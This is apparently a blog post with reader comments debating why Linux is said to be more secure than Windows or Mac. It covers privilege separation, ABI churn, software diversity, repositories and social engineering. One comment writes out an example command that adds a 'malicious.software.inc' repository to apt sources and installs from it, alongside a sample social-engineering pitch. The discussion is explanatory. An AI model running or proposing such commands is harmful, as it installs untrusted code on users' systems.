One question for Linux gurus: Why is it that Linux/Ubuntu is said to be so secure..? (to the point you almost don't need AV)
Is it because simply no viruses are programmed for Linux (like Macs), or is there something special about Linux architecture/core that makes it less vulnerable to attacks..?
I'm not a guru, though with twelve years' experience, I feel I am qualified to answer.
The most important part involves the history of Unix (Linux is a Unix-alike), Which is forty years old. Unix has had privilege separation and emphasized multi-user environments for over thirty years, While the system for privilege separation is rather simple by today's standards, every program on any modern Unix (or Linux) grew out of the Unix multi-user culture. Programs respect it. They don't require Root (Admin) privileges to run. They don't expect a single user environment.
Like I said, this user/group/all privilege system is too simple to be comprehensively secure with all the sophisticated attack methods people use these days. SELinux and AppArmor are additional systems which sit on top of the old u-g-a system and which sandbox processes. Ubuntu uses AppArmor for a lot of applications.
On the other hand, desktop systems like Windows and Mac come from a single-user culture. Sure, the NT kernel and XNU kernel (part of Darwin) used by modern versions of Windows and Mac both have privelege separation (and in fact, Mac is a certified Unix, unlike Linux), but the cultures have long been single-user, and applications written on top of the kernels express that. It's difficult to secure a system when the applications are fighting you. In fact, Windows' security model is probably more advanced than Ubuntu's now, but some poor programming practices and the single-user culture shoot Windows' security in the foot. Mac, too, makes extreme compromises in the name of user-friendliness and sets itself up as the first to be the first to go down in all the Pwn2Own competitions.
Secondly, we have diversity and heterogeneity. Microsoft makes great effort to retain backward compatibility between releases. In other words, the ABI is stable. Binary programs which worked in version N-1 are expected to work in version N. The Linux kernel promises nothing of the sort, and indeed, seems to take great pride in changing the ABI as often as possible. Binary applications break randomly and no one makes an effort to stop that. Imagine being a Trojan or virus trying to keep up with the latest version. At any one time, there are tens of kernel versions in the wild, and in truth, each distribution generally has a slightly customized version.
Why doesn't that lack of ABI stabiliuty destroy the Linux ecosystem? Well, because few programs are binary. Linux has a relatively stable API, so applications can be easily re-compiled (by Debian and Ubuntu, in this case) to use the new kernel headers.
When you look on top of the kernel layer, you see even more heterogeneity, Not only do you have desktops for GNOME and KDE, but XFCE, ROX and LXDE. You have window managers like OpenBox, FluxBox, and RatPoison. You have two different print systems. You have three major word processors. i don't even want to count the number of browsers, file managers, and text editors. In a diverse system like this, what attack can be automated? Non-automated attacks are costly. Heck, you can even run Debian on the FreeBSD kernel if you want to.
Compare Linux's situation with Windows':
- ABI stability
- IE used in at least 60% of cases
- MS Office installed on most systems.
Finally, you have the market share factor. It's real. Windows is a large target with that homogeneity that Linux lacks. Not only does Linux have 1-2% of the installed base, that 1-2% is misleading ... because each distro is in actuality a different OS which likely needs different automated scans to be penetrated. How is all that work worth the effort?
Is Linux impenetrable? No, of course not. Red Hat 5 and 6 were especially vulnerable to some automated attacks, and one of my boxes even got owned back in 2000 or so. These days, there's not so much to worry about, but you are unlikely to stop a dedicated and talented individual from breaking in unless you know a good deal about system hardening. Then there's the user issue. Create a nice trojan. Package it as a .deb. Advertise it as a great new screensaver. Get users to install the .deb. Bang! The users are owned.
The weakest link is always the user. Once Linux gets an install base outside of techies, I expect we'll see some trojans.
One critical point is missing: Open source does not give you a guarantee that there will be no security flaws, but it does not allow anyone to hide back doors in their programs. Even if you won't read the source, someone else will.
ReplyDeleteI agree with you, but with people installing Skype, windows programs through Wine, and other closed-source apps, you lose that benefit.
ReplyDeleteYou say that there's no guarantee for ABI stability in Linux. That is wrong. ELF format doesn't change, and way to make syscalls is not changing. That is, as far as userspace processes (applications included) care, ABI does not change. Linux kernel does not break old applications; you can still run old closedsource ports of games, such as UT99 -- that is, ABI did not change with regard to kernel.
ReplyDeleteWhat does change is internal kernel API and ABI. A driver does not see a stable API and ABI; an application does (with regards to kernel). Grab old libraries and old software runs; grab old drivers for 2.2 and compiling them with today's 2.6.31 will fail miserably (not to mention an attempt to just insmod old .ko).
So why you probably can't run old apps on today's machines without recompiling, anyways? Because GNU/Linux culture says "Use shared objects!" (equivalent of .dlls). But as long as you do static linking of libraries, you're good to go. Since UT99 was statically linked with SDL and friends, it won't fail in finding .so files -- since it does not use them.
If a good hole is found, a statically linked virus or one attacking specifically Debian Lenny or Ubuntu 9.04 or similar would today probably penetrate a significant portion of machines.
What would stop it is quick patching of the hole and autoupdating via apt-get. And this is another thing that is dangerous among FLOSS users: trusting our repositories blindly and nearly absolutely, while it would be simple to slip a piece of malicious software through an update to a package. Repercussions would be severe for the one performing such an attack, but it is not impossible and I wonder why it didn't occur yet.
Otherwise your commentary is mostly something I can agree with and back.
Oh and:
ReplyDelete"Linux has a relatively stable API, so applications can be easily re-compiled (by Debian and Ubuntu, in this case) to use the new kernel headers."
Most apps don't touch the kernel headers :-)
Ivan,
ReplyDeleteThanks for the clarification of my point. If the program is written to POSIX or is a graphical app relying on mid-level libraries, then, yeah, but I was largely considering rootkits and the like (the classic Unix malware), which are generally inserted into a running kernel.
I definitely should have taken more time reading my post after it was written.
There is only one reason why is linux more secure than Windows. It is because how it handles executabe files. You cannon in linux simply double-clik on exe file and run it. Not in linux.. Even if you would obtain some malicious file, you have to make it executable first and then launch it with root privilegies. All this cannot average user do. But what he can do, is when clicks on malicious file in Windows, then clicks/skips UAC and you're done and enjoying infection. Not to mention a fact that you're still administrator after default Vista/7 installation...
ReplyDeleteAnonymous:
ReplyDelete1. "wine blah.exe", performed automatically for exe files on as-you-call-it "doubleclick".
2. "Dear Ubuntu user,
to run our SpecialSoftware2K, perform these steps. a) Right click on file (image 1). b) Go to permissions tab (image 2). c) Check the Executable checkbox (image 3). d) Doubleclick on the file (image 4)." Social engineering.
3. "To install, echo "deb http://malicious.software.inc/debian lenny" >> /etc/apt/sources.list ; apt-get install specialsoftware2k" - and similar but guified process will become a standard for installing crapware when a GNU/Linux distribution becomes popular among "commonfolk".
So while the matter your argument covers certainly helps improve the security, that's hardly the one-and-only reason, as you call it -- in fact, not even highly important.
Why isn't Mac so virus-ridden when you also don't have to manually mark a file as executable?
Linux is largely secure due to a couple of reasons:
ReplyDeleteFirst is the proper administrator/user account system. A user only has certain privileges, so a virus could only do limited damage if you even got one.
Second, being open source, it helps the developer community to issue patches quickly. If a hole or exploit is found, the fix comes right on the heals of that. Compare that to the IE spoofing bug that didn't get fixed for something like 7 years, and still isn't foolproof.
Third, the repository system keeps packages in check. This only works if you install only from repositories, and only from trusted ones. If you compile from source, or use unknown 3rd party repositories, you can create a security risk. However, if you only use repository built apps, the apps have been built by expert packagers that have tested the package and can assure you it's free of nasties.
Last, Windows allows applications that should run in user space to run in administrator space, thus causing insecurity. To make matters worse, they use technologies like Active-X to run in your browser that are completely filled with security holes. Linux is much better about this. Apps run in their proper user space, and now distros are introducing sandboxing to make it even more secure.
Linux isn't foolproof. There have been servers that have suffered attacks, and there are rootkits. However, Linux by way of it's Unix background and the fact that it's used on so many servers and powers the majority of the internet, itself, is built to be secure from scratch. Windows was built from single user DOS origins that were never intended to be used on servers or anything that might pose a security problem. Security was an afterthought with Windows.
NO, linux certainly isn't foolproof. It's a nice thought but not realistic. Any person on anyone (expect possibly a real base install of OpenBSD) and the ablity to be attacked. And that's not the worse of it, since now the linux kernel is bloated. Oo
ReplyDelete